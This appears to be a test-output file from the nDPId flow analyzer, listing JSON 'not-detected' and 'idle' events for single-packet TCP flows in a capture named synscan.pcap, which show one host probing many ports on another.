+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
